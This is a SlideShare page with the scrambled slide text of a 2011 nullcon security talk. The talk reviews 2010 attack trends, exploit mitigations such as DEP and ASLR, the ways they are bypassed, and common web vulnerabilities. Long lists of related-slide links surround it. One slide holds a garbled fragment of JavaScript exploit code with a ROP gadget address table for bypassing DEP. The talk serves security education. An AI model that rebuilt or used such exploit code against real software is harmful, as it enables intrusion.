SlideShare une entreprise Scribd logo

nullcon 2011 - Lessons learned from 2010

n|u - The Open Security Community
n|u - The Open Security Community

Lessons learned from 2010 by Saumil Shah

Technologie
1  sur  36
Télécharger pour lire hors ligne
2010: A Net Odyssey Saumil Shah nullCON Goa net-square 26.02.2011 n|u dwitiya
Welcome to NullCON! net-square nullcon.net | null.co.in n|u dwitiya
# who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% '(" )*+ ," net-square n|u dwitiya
What! did we! learn from! ?! net-square n|u dwitiya
net-square n|u dwitiya
Attack Surface net-square n|u dwitiya
ATTACK SURFACE 2010-2011 5 net-square n|u dwitiya
Wider Attack Surface 5 net-square n|u dwitiya
Ease of Exploitation 5 net-square n|u dwitiya
Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. track net-square n|u dwitiya
Complexity... 5 ...as neve seen r befo re! net-square n|u dwitiya
A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com puters net-square n|u dwitiya
"The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Plugins net-square n|u dwitiya
Exploit Mitigation Techniques net-square n|u dwitiya
/GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP net-square n|u dwitiya
/GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap Sprays Permanent DEP ROP ASLR and DEP JIT Sprays net-square n|u dwitiya
It's SPLOIT TIME! net-square n|u dwitiya
Jedi A/V Tricks These are not the sploitz you're looking for. net-square n|u dwitiya
Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploit net-square n|u dwitiya
High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricks net-square n|u dwitiya
This iz what ? net-square n|u dwitiya
I'm an evil Javascript I'm an innocent image net-square n|u dwitiya
function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u"+s.su (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS> net-square n|u dwitiya
Server Side Vulnerabilities net-square n|u dwitiya
SQL injection XSS CSRF RFI/LFI Input tampering net-square n|u dwitiya
Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerful net-square n|u dwitiya
W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010] net-square n|u dwitiya
Application Delivery Authentication Statefulness Data Typing Non-mutable net-square n|u dwitiya
The Web Application at present Delivery HTTP AJAX Authentication HTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
The FUTURE is HERE! net-square n|u dwitiya
No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfare net-square n|u dwitiya
The Solution? net-square n|u dwitiya
Keep on patching! net-square n|u dwitiya
I can haz sandbox I Also Can! net-square n|u dwitiya
The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Apps net-square n|u dwitiya
n|u dwitiya kthxbai saumil@net-square.com slideshare.net/saumilshah net-square www.net-square.com n|u dwitiya

Recommandé

Siembraera daniela arias
Siembraera daniela ariasSiembraera daniela arias
Siembraera daniela ariasEl profe Noé
 
Guia formato siembraera
Guia formato siembraeraGuia formato siembraera
Guia formato siembraeraEl profe Noé
 
Siembra era danniel roland mono
Siembra era danniel roland monoSiembra era danniel roland mono
Siembra era danniel roland monoEl profe Noé
 
Plm overview
Plm overviewPlm overview
Plm overviewSrinivasan Mudaliar
 
Agromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónAgromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónEl profe Noé
 
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...El profe Noé
 
Siembraera karen y_sebastian
Siembraera karen y_sebastianSiembraera karen y_sebastian
Siembraera karen y_sebastianEl profe Noé
 
Anossessenta
AnossessentaAnossessenta
Anossessentaguest9b75eaa
 

Recommandé

Siembraera daniela arias
Siembraera daniela ariasSiembraera daniela arias
Siembraera daniela ariasEl profe Noé
 
Guia formato siembraera
Guia formato siembraeraGuia formato siembraera
Guia formato siembraeraEl profe Noé
 
Siembra era danniel roland mono
Siembra era danniel roland monoSiembra era danniel roland mono
Siembra era danniel roland monoEl profe Noé
 
Plm overview
Plm overviewPlm overview
Plm overviewSrinivasan Mudaliar
 
Agromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónAgromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónEl profe Noé
 
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...El profe Noé
 
Siembraera karen y_sebastian
Siembraera karen y_sebastianSiembraera karen y_sebastian
Siembraera karen y_sebastianEl profe Noé
 
Anossessenta
AnossessentaAnossessenta
Anossessentaguest9b75eaa
 
NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESeliane_ac
 
Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Hotel Schulerhof
 
Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)Katia Cilene da Silva
 
Defeating Drones
Defeating DronesDefeating Drones
Defeating Dronesn|u - The Open Security Community
 
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...n|u - The Open Security Community
 
Making of GameOver
Making of GameOverMaking of GameOver
Making of GameOvern|u - The Open Security Community
 
DOIS LAGOS
DOIS LAGOSDOIS LAGOS
DOIS LAGOSeliane_ac
 
Obrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].PpsmatObrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].Ppsmatguest9b75eaa
 
Tea time
Tea time Tea time
Tea time Lota Moncada
 
Market report 0512
Market report 0512Market report 0512
Market report 0512Len Nevin
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAeliane_ac
 
2 the blackspot investigation process
2 the blackspot investigation process2 the blackspot investigation process
2 the blackspot investigation processIndonesia Infrastructure Initiative
 
RESUME Lite - Thejasvi V
RESUME Lite - Thejasvi VRESUME Lite - Thejasvi V
RESUME Lite - Thejasvi VThejasvi Voniadka
 
Laboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosLaboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosRoocelli
 
Hero Locksmith
Hero Locksmith Hero Locksmith
Hero Locksmith Hero Locksmith
 
Fotoalbum.swv
Fotoalbum.swvFotoalbum.swv
Fotoalbum.swvleon_klein
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good PackagesSaumil Shah
 
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxData
 
JavaFX
JavaFXJavaFX
JavaFXRaphael Marques
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingBozhidar Batsov
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"DataStax Academy
 

Contenu connexe

En vedette

NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESeliane_ac
 
Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Hotel Schulerhof
 
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...n|u - The Open Security Community
 
Obrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].PpsmatObrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].Ppsmatguest9b75eaa
 
Market report 0512
Market report 0512Market report 0512
Market report 0512Len Nevin
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAeliane_ac
 
Laboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosLaboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosRoocelli
 

En vedette (16)

NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORES
 
Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta
 
Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)
 
Defeating Drones
Defeating DronesDefeating Drones
Defeating Drones
 
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
 
Making of GameOver
Making of GameOverMaking of GameOver
Making of GameOver
 
DOIS LAGOS
DOIS LAGOSDOIS LAGOS
DOIS LAGOS
 
Obrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].PpsmatObrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].Ppsmat
 
Tea time
Tea time Tea time
Tea time
 
Market report 0512
Market report 0512Market report 0512
Market report 0512
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIA
 
2 the blackspot investigation process
2 the blackspot investigation process2 the blackspot investigation process
2 the blackspot investigation process
 
RESUME Lite - Thejasvi V
RESUME Lite - Thejasvi VRESUME Lite - Thejasvi V
RESUME Lite - Thejasvi V
 
Laboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosLaboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivos
 
Hero Locksmith
Hero Locksmith Hero Locksmith
Hero Locksmith
 
Fotoalbum.swv
Fotoalbum.swvFotoalbum.swv
Fotoalbum.swv
 

Similaire à nullcon 2011 - Lessons learned from 2010

When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good PackagesSaumil Shah
 
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxData
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingBozhidar Batsov
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for CassandraEdward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"DataStax Academy
 
3D Design with OpenSCAD
3D Design with OpenSCAD3D Design with OpenSCAD
3D Design with OpenSCADVickyTGAW
 
Mining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social HaystackMining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social HaystackMatthew Russell
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...Positive Hack Days
 
Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint MongoDB
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....Michele Orselli
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....Alessandro Cinelli (cirpo)
 
Lecture: Vaadin Overview
Lecture: Vaadin OverviewLecture: Vaadin Overview
Lecture: Vaadin OverviewJoonas Lehtinen
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit DeliverySaumil Shah
 

Similaire à nullcon 2011 - Lessons learned from 2010 (20)

When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
 
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
 
JavaFX
JavaFXJavaFX
JavaFX
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programing
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
 
3D Design with OpenSCAD
3D Design with OpenSCAD3D Design with OpenSCAD
3D Design with OpenSCAD
 
Mining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social HaystackMining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social Haystack
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
Raphaël and You
Raphaël and YouRaphaël and You
Raphaël and You
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
 
Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
 
Lecture: Vaadin Overview
Lecture: Vaadin OverviewLecture: Vaadin Overview
Lecture: Vaadin Overview
 
Vectorization in ATLAS
Vectorization in ATLASVectorization in ATLAS
Vectorization in ATLAS
 
What Lies Beneath
What Lies BeneathWhat Lies Beneath
What Lies Beneath
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
 
Opa hackathon
Opa hackathonOpa hackathon
Opa hackathon
 

Plus de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxBkGupta21
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 

Dernier (20)

Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
